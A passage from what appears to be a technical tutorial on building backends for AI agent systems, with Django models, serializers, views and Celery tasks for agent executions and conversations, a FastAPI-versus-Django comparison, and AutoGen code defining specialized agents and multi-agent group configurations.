461 5. Provide a final research report that includes:
462 - Executive Summary
463 - Key Findings
464 - Analysis and Interpretation
465 - Limitations and Gaps
466 - Conclusions and Implications
467 """
468
469 # Initiate the chat
470 user_proxy.initiate_chat(
471 manager,
472 message=research_prompt
473 )
474
475 # Process the results
476 chat_history = user_proxy.chat_history
477
478 # Extract the final research report
479 final_report = None
480 for message in reversed(chat_history):
481 # Look for the last comprehensive message from any assistant
482 if message["role"] == "assistant" and len(message["content"]) > 1000:
483 final_report = message["content"]
484 break
485
486 return {
487 "topic": topic,
488 "depth": depth,
489 "report": final_report,
490 "chat_history": chat_history,
491 "team_members": ["Researcher", "Analyst", "Critic"]
492 }
493
494
495class CustomMultiAgentSystem:
496 """Custom implementation of a multi-agent system based on configuration."""
497
498 def __init__(self, config_list: List[Dict[str, Any]], parameters: Dict[str, Any]):
499 self.config_list = config_list
500 self.parameters = parameters
501
502 async def execute(self, parameters: Dict[str, Any]) -> Dict[str, Any]:
503 """Execute the custom multi-agent system."""
504 # This would be implemented based on the specific requirements
505 # of the custom multi-agent system configuration
506 raise NotImplementedError("Custom multi-agent systems are not yet implemented")

Django Backend for AI Agents

Django offers a more structured approach with built-in admin interfaces, ORM, and a comprehensive framework for building complex applications.

python
1# models.py
2from django.db import models
3from django.contrib.auth.models import User
4import uuid
5import json
6
7class AgentType(models.Model):
8 """Model representing different types of AI agents available in the system."""
9 name = models.CharField(max_length=100, unique=True)
10 description = models.TextField()
11 parameters_schema = models.JSONField(default=dict)
12 is_active = models.BooleanField(default=True)
13 created_at = models.DateTimeField(auto_now_add=True)
14 updated_at = models.DateTimeField(auto_now=True)
15
16 def __str__(self):
17 return self.name
18
19class AgentExecution(models.Model):
20 """Model for tracking agent execution jobs."""
21 STATUS_CHOICES = (
22 ('pending', 'Pending'),
23 ('running', 'Running'),
24 ('completed', 'Completed'),
25 ('failed', 'Failed'),
26 ('canceled', 'Canceled'),
27 )
28
29 id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
30 user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='agent_executions')
31 agent_type = models.ForeignKey(AgentType, on_delete=models.CASCADE)
32
33 status = models.CharField(max_length=20, choices=STATUS_CHOICES, default='pending')
34 parameters = models.JSONField(default=dict)
35 result = models.JSONField(null=True, blank=True)
36 error_message = models.TextField(null=True, blank=True)
37
38 created_at = models.DateTimeField(auto_now_add=True)
39 started_at = models.DateTimeField(null=True, blank=True)
40 completed_at = models.DateTimeField(null=True, blank=True)
41
42 priority = models.IntegerField(default=0)
43 celery_task_id = models.CharField(max_length=255, null=True, blank=True)
44
45 # Performance metrics
46 execution_time = models.FloatField(null=True, blank=True)
47 tokens_used = models.IntegerField(null=True, blank=True)
48
49 class Meta:
50 ordering = ['-created_at']
51 indexes = [
52 models.Index(fields=['user', 'status']),
53 models.Index(fields=['agent_type', 'status']),
54 ]
55
56 def __str__(self):
57 return f"{self.agent_type} execution by {self.user.username} ({self.status})"
58
59class AgentFeedback(models.Model):
60 """Model for storing user feedback on agent executions."""
61 RATING_CHOICES = (
62 (1, '1 - Poor'),
63 (2, '2 - Fair'),
64 (3, '3 - Good'),
65 (4, '4 - Very Good'),
66 (5, '5 - Excellent'),
67 )
68
69 execution = models.ForeignKey(AgentExecution, on_delete=models.CASCADE, related_name='feedback')
70 user = models.ForeignKey(User, on_delete=models.CASCADE)
71
72 rating = models.IntegerField(choices=RATING_CHOICES)
73 comments = models.TextField(null=True, blank=True)
74 created_at = models.DateTimeField(auto_now_add=True)
75
76 class Meta:
77 unique_together = ('execution', 'user')
78 ordering = ['-created_at']
79
80 def __str__(self):
81 return f"Feedback on {self.execution} by {self.user.username}"
82
83class AgentConversation(models.Model):
84 """Model for persistent conversations with agents."""
85 id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
86 user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='agent_conversations')
87 agent_type = models.ForeignKey(AgentType, on_delete=models.CASCADE)
88
89 title = models.CharField(max_length=255)
90 is_active = models.BooleanField(default=True)
91 created_at = models.DateTimeField(auto_now_add=True)
92 updated_at = models.DateTimeField(auto_now=True)
93
94 metadata = models.JSONField(default=dict, blank=True)
95
96 class Meta:
97 ordering = ['-updated_at']
98
99 def __str__(self):
100 return f"{self.title} ({self.agent_type})"
101
102class ConversationMessage(models.Model):
103 """Model for messages within a conversation."""
104 MESSAGE_ROLE_CHOICES = (
105 ('user', 'User'),
106 ('assistant', 'Assistant'),
107 ('system', 'System'),
108 )
109
110 conversation = models.ForeignKey(AgentConversation, on_delete=models.CASCADE, related_name='messages')
111 role = models.CharField(max_length=10, choices=MESSAGE_ROLE_CHOICES)
112 content = models.TextField()
113
114 created_at = models.DateTimeField(auto_now_add=True)
115 tokens = models.IntegerField(default=0)
116
117 metadata = models.JSONField(default=dict, blank=True)
118
119 class Meta:
120 ordering = ['created_at']
121
122 def __str__(self):
123 return f"{self.role} message in {self.conversation}"
python
1# serializers.py
2from rest_framework import serializers
3from .models import AgentType, AgentExecution, AgentFeedback, AgentConversation, ConversationMessage
4from django.contrib.auth.models import User
5
6class UserSerializer(serializers.ModelSerializer):
7 class Meta:
8 model = User
9 fields = ['id', 'username', 'email', 'first_name', 'last_name']
10 read_only_fields = fields
11
12class AgentTypeSerializer(serializers.ModelSerializer):
13 class Meta:
14 model = AgentType
15 fields = ['id', 'name', 'description', 'parameters_schema', 'is_active']
16 read_only_fields = ['id', 'created_at', 'updated_at']
17
18class AgentExecutionSerializer(serializers.ModelSerializer):
19 user = UserSerializer(read_only=True)
20 agent_type = AgentTypeSerializer(read_only=True)
21 agent_type_id = serializers.PrimaryKeyRelatedField(
22 queryset=AgentType.objects.all(),
23 write_only=True,
24 source='agent_type'
25 )
26
27 class Meta:
28 model = AgentExecution
29 fields = [
30 'id', 'user', 'agent_type', 'agent_type_id', 'status',
31 'parameters', 'result', 'error_message', 'created_at',
32 'started_at', 'completed_at', 'execution_time', 'tokens_used',
33 'priority', 'celery_task_id'
34 ]
35 read_only_fields = [
36 'id', 'user', 'status', 'result', 'error_message', 'created_at',
37 'started_at', 'completed_at', 'execution_time', 'tokens_used',
38 'celery_task_id'
39 ]
40
41 def create(self, validated_data):
42 # Set the user from the request
43 user = self.context['request'].user
44 validated_data['user'] = user
45 return super().create(validated_data)
46
47class AgentFeedbackSerializer(serializers.ModelSerializer):
48 user = UserSerializer(read_only=True)
49
50 class Meta:
51 model = AgentFeedback
52 fields = ['id', 'execution', 'user', 'rating', 'comments', 'created_at']
53 read_only_fields = ['id', 'user', 'created_at']
54
55 def create(self, validated_data):
56 # Set the user from the request
57 user = self.context['request'].user
58 validated_data['user'] = user
59 return super().create(validated_data)
60
61class ConversationMessageSerializer(serializers.ModelSerializer):
62 class Meta:
63 model = ConversationMessage
64 fields = ['id', 'conversation', 'role', 'content', 'created_at', 'tokens', 'metadata']
65 read_only_fields = ['id', 'created_at', 'tokens']
66
67class AgentConversationSerializer(serializers.ModelSerializer):
68 user = UserSerializer(read_only=True)
69 agent_type = AgentTypeSerializer(read_only=True)
70 agent_type_id = serializers.PrimaryKeyRelatedField(
71 queryset=AgentType.objects.all(),
72 write_only=True,
73 source='agent_type'
74 )
75 messages = ConversationMessageSerializer(many=True, read_only=True)
76
77 class Meta:
78 model = AgentConversation
79 fields = [
80 'id', 'user', 'agent_type', 'agent_type_id', 'title',
81 'is_active', 'created_at', 'updated_at', 'metadata', 'messages'
82 ]
83 read_only_fields = ['id', 'user', 'created_at', 'updated_at']
84
85 def create(self, validated_data):
86 # Set the user from the request
87 user = self.context['request'].user
88 validated_data['user'] = user
89 return super().create(validated_data)
90
91class MessageCreateSerializer(serializers.Serializer):
92 """Serializer for creating a new message and getting agent response."""
93 conversation_id = serializers.UUIDField()
94 content = serializers.CharField()
95 metadata = serializers.JSONField(required=False)
96
97 def validate_conversation_id(self, value):
98 try:
99 conversation = AgentConversation.objects.get(id=value)
100 if conversation.user != self.context['request'].user:
101 raise serializers.ValidationError("Conversation does not belong to the current user")
102 return value
103 except AgentConversation.DoesNotExist:
104 raise serializers.ValidationError("Conversation does not exist")
python
1# views.py
2from rest_framework import viewsets, status, permissions
3from rest_framework.decorators import action
4from rest_framework.response import Response
5from django.utils import timezone
6from django.db import transaction
7from django_celery_results.models import TaskResult
8
9from .models import AgentType, AgentExecution, AgentFeedback, AgentConversation, ConversationMessage
10from .serializers import (
11 AgentTypeSerializer, AgentExecutionSerializer, AgentFeedbackSerializer,
12 AgentConversationSerializer, ConversationMessageSerializer, MessageCreateSerializer
13)
14from .tasks import execute_agent_task, process_agent_message
15from .agents import get_agent_registry
16
17class AgentTypeViewSet(viewsets.ReadOnlyModelViewSet):
18 """ViewSet for listing available agent types."""
19 queryset = AgentType.objects.filter(is_active=True)
20 serializer_class = AgentTypeSerializer
21 permission_classes = [permissions.IsAuthenticated]
22
23 @action(detail=True, methods=['get'])
24 def parameters_schema(self, request, pk=None):
25 """Get the parameters schema for an agent type."""
26 agent_type = self.get_object()
27 return Response(agent_type.parameters_schema)
28
29class AgentExecutionViewSet(viewsets.ModelViewSet):
30 """ViewSet for managing agent executions."""
31 serializer_class = AgentExecutionSerializer
32 permission_classes = [permissions.IsAuthenticated]
33
34 def get_queryset(self):
35 """Return executions for the current user."""
36 return AgentExecution.objects.filter(user=self.request.user)
37
38 def create(self, request, *args, **kwargs):
39 """Create a new agent execution and queue the task."""
40 serializer = self.get_serializer(data=request.data)
41 serializer.is_valid(raise_exception=True)
42
43 # Create the execution record
44 with transaction.atomic():
45 execution = serializer.save()
46 execution.status = 'pending'
47 execution.save()
48
49 # Queue the task
50 task = execute_agent_task.delay(str(execution.id))
51 execution.celery_task_id = task.id
52 execution.save()
53
54 headers = self.get_success_headers(serializer.data)
55 return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
56
57 @action(detail=True, methods=['post'])
58 def cancel(self, request, pk=None):
59 """Cancel a running execution."""
60 execution = self.get_object()
61
62 if execution.status not in ['pending', 'running']:
63 return Response(
64 {"detail": "Only pending or running executions can be canceled."},
65 status=status.HTTP_400_BAD_REQUEST
66 )
67
68 # Revoke the Celery task
69 if execution.celery_task_id:
70 from celery.task.control import revoke
71 revoke(execution.celery_task_id, terminate=True)
72
73 # Update execution status
74 execution.status = 'canceled'
75 execution.completed_at = timezone.now()
76 execution.save()
77
78 serializer = self.get_serializer(execution)
79 return Response(serializer.data)
80
81 @action(detail=True, methods=['post'])
82 def feedback(self, request, pk=None):
83 """Add feedback for an execution."""
84 execution = self.get_object()
85
86 # Check if execution is completed
87 if execution.status != 'completed':
88 return Response(
89 {"detail": "Feedback can only be provided for completed executions."},
90 status=status.HTTP_400_BAD_REQUEST
91 )
92
93 # Create or update feedback
94 feedback_data = {
95 'execution': execution.id,
96 'rating': request.data.get('rating'),
97 'comments': request.data.get('comments', '')
98 }
99
100 # Check if feedback already exists
101 try:
102 feedback = AgentFeedback.objects.get(execution=execution, user=request.user)
103 feedback_serializer = AgentFeedbackSerializer(
104 feedback, data=feedback_data, context={'request': request}
105 )
106 except AgentFeedback.DoesNotExist:
107 feedback_serializer = AgentFeedbackSerializer(
108 data=feedback_data, context={'request': request}
109 )
110
111 feedback_serializer.is_valid(raise_exception=True)
112 feedback_serializer.save()
113
114 return Response(feedback_serializer.data)
115
116class ConversationViewSet(viewsets.ModelViewSet):
117 """ViewSet for managing agent conversations."""
118 serializer_class = AgentConversationSerializer
119 permission_classes = [permissions.IsAuthenticated]
120
121 def get_queryset(self):
122 """Return conversations for the current user."""
123 return AgentConversation.objects.filter(user=self.request.user)
124
125 @action(detail=True, methods=['post'])
126 def send_message(self, request, pk=None):
127 """Send a new message and get the agent's response."""
128 conversation = self.get_object()
129
130 # Ensure conversation is active
131 if not conversation.is_active:
132 return Response(
133 {"detail": "This conversation is no longer active."},
134 status=status.HTTP_400_BAD_REQUEST
135 )
136
137 # Validate message data
138 serializer = MessageCreateSerializer(
139 data={'conversation_id': str(conversation.id), **request.data},
140 context={'request': request}
141 )
142 serializer.is_valid(raise_exception=True)
143
144 # Create user message
145 content = serializer.validated_data['content']
146 metadata = serializer.validated_data.get('metadata', {})
147
148 user_message = ConversationMessage.objects.create(
149 conversation=conversation,
150 role='user',
151 content=content,
152 metadata=metadata
153 )
154
155 # Update conversation timestamp
156 conversation.updated_at = timezone.now()
157 conversation.save()
158
159 # Process message asynchronously
160 task = process_agent_message.delay(
161 conversation_id=str(conversation.id),
162 message_id=str(user_message.id)
163 )
164
165 # Return the user message and task ID
166 return Response({
167 'message': ConversationMessageSerializer(user_message).data,
168 'task_id': task.id,
169 'status': 'processing'
170 })
171
172 @action(detail=True, methods=['get'])
173 def messages(self, request, pk=None):
174 """Get all messages in a conversation."""
175 conversation = self.get_object()
176 messages = conversation.messages.all()
177
178 # Handle pagination
179 page = self.paginate_queryset(messages)
180 if page is not None:
181 serializer = ConversationMessageSerializer(page, many=True)
182 return self.get_paginated_response(serializer.data)
183
184 serializer = ConversationMessageSerializer(messages, many=True)
185 return Response(serializer.data)
186
187 @action(detail=True, methods=['post'])
188 def archive(self, request, pk=None):
189 """Archive a conversation."""
190 conversation = self.get_object()
191 conversation.is_active = False
192 conversation.save()
193
194 serializer = self.get_serializer(conversation)
195 return Response(serializer.data)
python
1# tasks.py
2import time
3import logging
4from celery import shared_task
5from django.utils import timezone
6from django.db import transaction
7
8logger = logging.getLogger(__name__)
9
10@shared_task(bind=True, max_retries=3, default_retry_delay=60)
11def execute_agent_task(self, execution_id):
12 """Execute an agent task asynchronously."""
13 from .models import AgentExecution
14 from .agents import get_agent_registry
15
16 logger.info(f"Starting agent execution {execution_id}")
17
18 try:
19 # Get the execution
20 execution = AgentExecution.objects.get(id=execution_id)
21
22 # Update status to running
23 execution.status = 'running'
24 execution.started_at = timezone.now()
25 execution.save()
26
27 # Get the agent registry
28 agent_registry = get_agent_registry()
29
30 # Get the agent factory
31 agent_type_name = execution.agent_type.name
32 if agent_type_name not in agent_registry:
33 raise ValueError(f"Unknown agent type: {agent_type_name}")
34
35 agent_factory = agent_registry[agent_type_name]
36
37 # Create the agent
38 agent = agent_factory(execution.parameters)
39
40 # Start timing
41 start_time = time.time()
42
43 # Execute the agent
44 result = agent.execute(execution.parameters)
45
46 # Calculate execution time
47 execution_time = time.time() - start_time
48
49 # Update execution with results
50 execution.status = 'completed'
51 execution.result = result
52 execution.completed_at = timezone.now()
53 execution.execution_time = execution_time
54
55 # Extract token usage if available
56 if 'token_usage' in result:
57 execution.tokens_used = result['token_usage'].get('total_tokens', 0)
58
59 execution.save()
60
61 logger.info(f"Completed agent execution {execution_id}")
62 return {'execution_id': execution_id, 'status': 'completed'}
63
64 except Exception as e:
65 logger.exception(f"Error executing agent {execution_id}: {str(e)}")
66
67 try:
68 # Update execution with error
69 execution = AgentExecution.objects.get(id=execution_id)
70 execution.status = 'failed'
71 execution.error_message = str(e)
72 execution.completed_at = timezone.now()
73 execution.save()
74 except Exception as inner_e:
75 logger.exception(f"Error updating execution status: {str(inner_e)}")
76
77 # Retry for certain errors
78 if 'Rate limit' in str(e) or 'timeout' in str(e).lower():
79 raise self.retry(exc=e)
80
81 return {'execution_id': execution_id, 'status': 'failed', 'error': str(e)}
82
83@shared_task(bind=True, max_retries=2)
84def process_agent_message(self, conversation_id, message_id):
85 """Process a message in a conversation and generate agent response."""
86 from .models import AgentConversation, ConversationMessage
87 from .agents import get_agent_registry
88
89 logger.info(f"Processing message {message_id} in conversation {conversation_id}")
90
91 try:
92 # Get the conversation and message
93 conversation = AgentConversation.objects.get(id=conversation_id)
94 message = ConversationMessage.objects.get(id=message_id, conversation=conversation)
95
96 # Get recent conversation history (last 10 messages)
97 history = list(conversation.messages.order_by('-created_at')[:10])
98 history.reverse() # Chronological order
99
100 # Format history for the agent
101 formatted_history = []
102 for msg in history:
103 if msg.id != message.id: # Skip the current message
104 formatted_history.append({
105 'role': msg.role,
106 'content': msg.content
107 })
108
109 # Get the agent registry
110 agent_registry = get_agent_registry()
111
112 # Get the agent factory
113 agent_type_name = conversation.agent_type.name
114 if agent_type_name not in agent_registry:
115 raise ValueError(f"Unknown agent type: {agent_type_name}")
116
117 agent_factory = agent_registry[agent_type_name]
118
119 # Create the agent
120 agent = agent_factory({})
121
122 # Generate response
123 response = agent.generate_response(
124 message=message.content,
125 history=formatted_history,
126 metadata=conversation.metadata
127 )
128
129 # Create response message
130 with transaction.atomic():
131 agent_message = ConversationMessage.objects.create(
132 conversation=conversation,
133 role='assistant',
134 content=response['content'],
135 tokens=response.get('tokens', 0),
136 metadata=response.get('metadata', {})
137 )
138
139 # Update conversation timestamp
140 conversation.updated_at = timezone.now()
141 conversation.save()
142
143 logger.info(f"Created response message {agent_message.id} in conversation {conversation_id}")
144 return {
145 'conversation_id': conversation_id,
146 'message_id': str(message.id),
147 'response_id': str(agent_message.id),
148 'status': 'completed'
149 }
150
151 except Exception as e:
152 logger.exception(f"Error processing message {message_id}: {str(e)}")
153
154 try:
155 # Create error message
156 error_message = f"I'm sorry, I encountered an error processing your message: {str(e)}"
157
158 ConversationMessage.objects.create(
159 conversation_id=conversation_id,
160 role='system',
161 content=error_message
162 )
163 except Exception as inner_e:
164 logger.exception(f"Error creating error message: {str(inner_e)}")
165
166 # Retry for certain errors
167 if 'Rate limit' in str(e) or 'timeout' in str(e).lower():
168 raise self.retry(exc=e)
169
170 return {
171 'conversation_id': conversation_id,
172 'message_id': message_id,
173 'status': 'failed',
174 'error': str(e)
175 }
python
1# urls.py
2from django.urls import path, include
3from rest_framework.routers import DefaultRouter
4from . import views
5
6router = DefaultRouter()
7router.register(r'agent-types', views.AgentTypeViewSet, basename='agent-type')
8router.register(r'executions', views.AgentExecutionViewSet, basename='execution')
9router.register(r'conversations', views.ConversationViewSet, basename='conversation')
10
11urlpatterns = [
12 path('', include(router.urls)),
13]

Key Differences Between FastAPI and Django for AI Agent Systems:

  1. Setup Complexity:

    • FastAPI: Lightweight, modular, setup only what you need
    • Django: Comprehensive framework with more initial setup but comes with many built-in features
  2. Performance:

    • FastAPI: Built for high-performance async processing, ideal for agent-based systems with many concurrent requests
    • Django: Traditionally synchronous (though supports async), slightly more overhead but still handles high loads
  3. Database Access:

    • FastAPI: Flexible - use any ORM or direct database access
    • Django: Built-in ORM with powerful query capabilities and migrations
  4. Admin Interface:

    • FastAPI: Requires custom implementation
    • Django: Comes with a powerful admin interface out of the box
  5. Authentication and Security:

    • FastAPI: Requires manual implementation or third-party libraries
    • Django: Comprehensive built-in authentication and security features
  6. Scaling Strategy:

    • FastAPI: Often deployed with multiple instances behind a load balancer
    • Django: Similar scaling approach, but with more consideration for database connections

Configuring AutoGen for Multi-Agent Interactions

AutoGen provides a powerful framework for creating multi-agent interactions where specialized agents collaborate to solve complex problems. Here's a comprehensive guide to configuring AutoGen for sophisticated agent systems:

1. Defining Specialized Agents

python
1# agent_framework/specialized_agents.py
2import autogen
3from typing import Dict, List, Any, Optional
4
5class SpecializedAgentFactory:
6 """Factory for creating specialized agents with specific capabilities."""
7
8 def __init__(self, llm_config: Dict[str, Any]):
9 """Initialize with base LLM configuration."""
10 self.llm_config = llm_config
11
12 def create_research_agent(self) -> autogen.AssistantAgent:
13 """Create a research specialist agent."""
14 return autogen.AssistantAgent(
15 name="ResearchAgent",
16 system_message="""You are a research specialist who excels at gathering comprehensive information.
17
18 Your capabilities:
19 1. Finding detailed information on complex topics
20 2. Identifying key points and summarizing research findings
21 3. Evaluating the reliability and credibility of sources
22 4. Organizing information in a structured way
23 5. Identifying knowledge gaps that require further research
24
25 When conducting research:
26 - Start by understanding the core question and breaking it into sub-questions
27 - Consider multiple perspectives and potential biases
28 - Cite sources and distinguish between facts and inferences
29 - Organize findings in a logical structure
30 - Highlight confidence levels in different pieces of information
31 """,
32 llm_config=self.llm_config
33 )
34
35 def create_reasoning_agent(self) -> autogen.AssistantAgent:
36 """Create a reasoning and analysis specialist agent."""
37 return autogen.AssistantAgent(
38 name="ReasoningAgent",
39 system_message="""You are a reasoning and analysis specialist with exceptional critical thinking.
40
41 Your capabilities:
42 1. Analyzing complex problems and breaking them down systematically
43 2. Identifying logical fallacies and cognitive biases
44 3. Weighing evidence and evaluating arguments
45 4. Drawing sound conclusions based on available information
46 5. Considering alternative explanations and counterfactuals
47
48 When analyzing problems:
49 - Clarify the core problem and relevant considerations
50 - Identify assumptions and evaluate their validity
51 - Consider multiple perspectives and approaches
52 - Look for logical inconsistencies and gaps in reasoning
53 - Develop structured arguments with clear logical flow
54 """,
55 llm_config=self.llm_config
56 )
57
58 def create_coding_agent(self) -> autogen.AssistantAgent:
59 """Create a coding specialist agent."""
60 coding_config = self.llm_config.copy()
61 coding_config["temperature"] = min(coding_config.get("temperature", 0.7), 0.3)
62
63 return autogen.AssistantAgent(
64 name="CodingAgent",
65 system_message="""You are a coding specialist who excels at software development and implementation.
66
67 Your capabilities:
68 1. Writing clean, efficient, and maintainable code
69 2. Debugging and solving technical problems
70 3. Designing software solutions for specific requirements
71 4. Explaining code functionality and design decisions
72 5. Optimizing code for performance and readability
73
74 When writing code:
75 - Ensure code is correct, efficient, and follows best practices
76 - Include clear comments explaining complex logic
77 - Consider edge cases and error handling
78 - Focus on clean, maintainable structure
79 - Test thoroughly and validate solutions
80 """,
81 llm_config=coding_config
82 )
83
84 def create_critic_agent(self) -> autogen.AssistantAgent:
85 """Create a critic agent for evaluating solutions and identifying flaws."""
86 critic_config = self.llm_config.copy()
87 critic_config["temperature"] = min(critic_config.get("temperature", 0.7), 0.4)
88
89 return autogen.AssistantAgent(
90 name="CriticAgent",
91 system_message="""You are a critical evaluation specialist who excels at identifying flaws and improvements.
92
93 Your capabilities:
94 1. Identifying logical flaws and inconsistencies in reasoning
95 2. Spotting edge cases and potential failure modes in solutions
96 3. Suggesting specific improvements to solutions
97 4. Challenging assumptions and evaluating evidence
98 5. Providing constructive criticism in a clear, actionable way
99
100 When providing critique:
101 - Be specific about what issues you've identified
102 - Explain why each issue matters and its potential impact
103 - Suggest concrete improvements, not just problems
104 - Consider both major and minor issues
105 - Be thorough but constructive in your feedback
106 """,
107 llm_config=critic_config
108 )
109
110 def create_pm_agent(self) -> autogen.AssistantAgent:
111 """Create a project manager agent for coordinating multi-step tasks."""
112 return autogen.AssistantAgent(
113 name="ProjectManager",
114 system_message="""You are a project management specialist who excels at organizing and coordinating complex tasks.
115
116 Your capabilities:
117 1. Breaking down complex problems into manageable steps
118 2. Assigning appropriate tasks to different specialists
119 3. Tracking progress and ensuring all aspects are addressed
120 4. Synthesizing information from different sources
121 5. Ensuring the final deliverable meets requirements
122
123 When managing projects:
124 - Start by clarifying the overall goal and requirements
125 - Create a structured plan with clear steps
126 - Determine what specialist skills are needed for each step
127 - Monitor progress and adjust the plan as needed
128 - Ensure all components are integrated into a cohesive final product
129 """,
130 llm_config=self.llm_config
131 )
132
133 def create_creative_agent(self) -> autogen.AssistantAgent:
134 """Create a creative specialist for innovative solutions and content."""
135 creative_config = self.llm_config.copy()
136 creative_config["temperature"] = max(creative_config.get("temperature", 0.7), 0.8)
137
138 return autogen.AssistantAgent(
139 name="CreativeAgent",
140 system_message="""You are a creative specialist who excels at generating innovative ideas and content.
141
142 Your capabilities:
143 1. Generating novel approaches to problems
144 2. Creating engaging and original content
145 3. Thinking outside conventional frameworks
146 4. Connecting disparate concepts in insightful ways
147 5. Developing unique perspectives and innovative solutions
148
149 When approaching creative tasks:
150 - Consider unconventional approaches and perspectives
151 - Look for unexpected connections between concepts
152 - Blend different ideas to create something new
153 - Balance creativity with practicality and relevance
154 - Iterate and refine creative concepts
155 """,
156 llm_config=creative_config
157 )

2. Creating Agent Groups with Different Collaboration Patterns

python
1# agent_framework/agent_groups.py
2import autogen
3from typing import Dict, List, Any, Optional
4from .specialized_agents import SpecializedAgentFactory
5
6class AgentGroupFactory:
7 """Factory for creating different configurations of agent groups."""
8
9 def __init__(self, llm_config: Dict[str, Any]):
10 """Initialize with base LLM configuration."""
11 self.llm_config = llm_config
12 self.agent_factory = SpecializedAgentFactory(llm_config)
13
14 def create_sequential_group(self, user_proxy=None) -> Dict[str, Any]:
15 """
16 Create a group of agents that work in sequence.
17
18 Returns:
19 Dictionary with agents and execution manager
20 """
21 if user_proxy is None:
22 user_proxy = self._create_default_user_proxy()
23
24 # Create specialized agents
25 research_agent = self.agent_factory.create_research_agent()
26 reasoning_agent = self.agent_factory.create_reasoning_agent()
27 critic_agent = self.agent_factory.create_critic_agent()
28
29 # Return the agents and a function to execute them in sequence
30 return {
31 "user_proxy": user_proxy,
32 "agents": {
33 "research": research_agent,
34 "reasoning": reasoning_agent,
35 "critic": critic_agent
36 },
37 "execute": lambda problem: self._execute_sequential_workflow(
38 user_proxy=user_proxy,
39 research_agent=research_agent,
40 reasoning_agent=reasoning_agent,
41 critic_agent=critic_agent,
42 problem=problem
43 )
44 }
45
46 def create_groupchat(self, user_proxy=None) -> Dict[str, Any]:
47 """
48 Create a group chat with multiple specialized agents.
49
50 Returns:
51 Dictionary with group chat and manager
52 """
53 if user_proxy is None:
54 user_proxy = self._create_default_user_proxy()
55
56 # Create specialized agents
57 research_agent = self.agent_factory.create_research_agent()
58 reasoning_agent = self.agent_factory.create_reasoning_agent()
59 creative_agent = self.agent_factory.create_creative_agent()
60 critic_agent = self.agent_factory.create_critic_agent()
61 pm_agent = self.agent_factory.create_pm_agent()
62
63 # Create group chat
64 groupchat = autogen.GroupChat(
65 agents=[user_proxy, pm_agent, research_agent, reasoning_agent, creative_agent, critic_agent],
66 messages=[],
67 max_round=20,
68 speaker_selection_method="round_robin" # Options: "auto", "round_robin", "random"
69 )
70
71 manager = autogen.GroupChatManager(groupchat=groupchat, llm_config=self.llm_config)
72
73 return {
74 "user_proxy": user_proxy,
75 "agents": {
76 "pm": pm_agent,
77 "research": research_agent,
78 "reasoning": reasoning_agent,
79 "creative": creative_agent,
80 "critic": critic_agent
81 },
82 "groupchat": groupchat,
83 "manager": manager,
84 "execute": lambda problem: self._execute_groupchat(
85 user_proxy=user_proxy,
86 manager=manager,
87 problem=problem
88 )
89 }
90
91 def create_hierarchical_team(self, user_proxy=None) -> Dict[str, Any]:
92 """
93 Create a hierarchical team with a manager and specialized agents.
94
95 Returns:
96 Dictionary with team structure and execution function
97 """
98 if user_proxy is None:
99 user_proxy = self._create_default_user_proxy()
100
101 # Create specialized agents
102 pm_agent = self.agent_factory.create_pm_agent()
103 research_agent = self.agent_factory.create_research_agent()
104 reasoning_agent = self.agent_factory.create_reasoning_agent()
105 coding_agent = self.agent_factory.create_coding_agent()
106 critic_agent = self.agent_factory.create_critic_agent()
107 creative_agent = self.agent_factory.create_creative_agent()
108
109 # Define the team hierarchy
110 team = {
111 "manager": pm_agent,
112 "specialists": {
113 "research": research_agent,
114 "reasoning": reasoning_agent,
115 "coding": coding_agent,
116 "creativity": creative_agent,
117 "critique": critic_agent
118 }
119 }
120
121 return {
122 "user_proxy": user_proxy,
123 "team": team,
124 "execute": lambda problem: self._execute_hierarchical_team(
125 user_proxy=user_proxy,
126 team=team,
127 problem=problem
128 )
129 }
130
131 def create_competitive_evaluation_team(self, user_proxy=None) -> Dict[str, Any]:
132 """
133 Create a competitive setup where multiple agents solve a problem
134 and a judge evaluates their solutions.
135
136 Returns:
137 Dictionary with team structure and execution function
138 """
139 if user_proxy is None:
140 user_proxy = self._create_default_user_proxy()
141
142 # Create specialized solution agents
143 reasoning_agent = self.agent_factory.create_reasoning_agent()
144 creative_agent = self.agent_factory.create_creative_agent()
145 research_agent = self.agent_factory.create_research_agent()
146
147 # Create judge agent with specific configuration for evaluation
148 judge_config = self.llm_config.copy()
149 judge_config["temperature"] = 0.2 # Low temperature for consistent evaluation
150
151 judge_agent = autogen.AssistantAgent(
152 name="JudgeAgent",
153 system_message="""You are an evaluation judge who assesses solutions objectively based on accuracy,
154 completeness, efficiency, innovation, and practicality.
155
156 Your task is to:
157 1. Evaluate each proposed solution based on clear criteria
158 2. Identify strengths and weaknesses of each approach
159 3. Select the best solution or suggest a hybrid approach combining strengths
160 4. Provide clear reasoning for your evaluation decisions
161 5. Be fair, impartial, and thorough in your assessment
162
163 Your evaluation should be structured, criteria-based, and focused on the quality of the solution.
164 """,
165 llm_config=judge_config
166 )
167
168 return {
169 "user_proxy": user_proxy,
170 "solution_agents": {
171 "reasoning": reasoning_agent,
172 "creative": creative_agent,
173 "research": research_agent
174 },
175 "judge": judge_agent,
176 "execute": lambda problem: self._execute_competitive_evaluation(
177 user_proxy=user_proxy,
178 solution_agents=[reasoning_agent, creative_agent, research_agent],
179 judge_agent=judge_agent,
180 problem=problem
181 )
182 }
183
184 # Helper methods for executing different group configurations
185
186 def _create_default_user_proxy(self) -> autogen.UserProxyAgent:
187 """Create a default user proxy agent."""
188 return autogen.UserProxyAgent(
189 name="User",
190 human_input_mode="NEVER",
191 max_consecutive_auto_reply=0,
192 code_execution_config={"work_dir": "coding_workspace", "use_docker": False}
193 )
194
195 def _execute_sequential_workflow(self, user_proxy, research_agent, reasoning_agent, critic_agent, problem):
196 """Execute a sequential workflow where agents work one after another."""
197 # Step 1: Research gathers information
198 user_proxy.initiate_chat(
199 research_agent,
200 message=f"I need you to research this problem thoroughly: {problem}\n\nGather relevant information, identify key concepts, and provide a comprehensive research summary."
201 )
202
203 # Extract research results from the last message
204 research_results = None
205 for message in reversed(user_proxy.chat_history):
206 if message["role"] == "assistant" and message.get("name") == "ResearchAgent":
207 research_results = message["content"]
208 break
209
210 # Step 2: Reasoning agent analyzes and solves
211 user_proxy.initiate_chat(
212 reasoning_agent,
213 message=f"Based on this research: {research_results}\n\nPlease analyze and develop a solution to the original problem: {problem}"
214 )
215
216 # Extract solution from the last message
217 solution = None
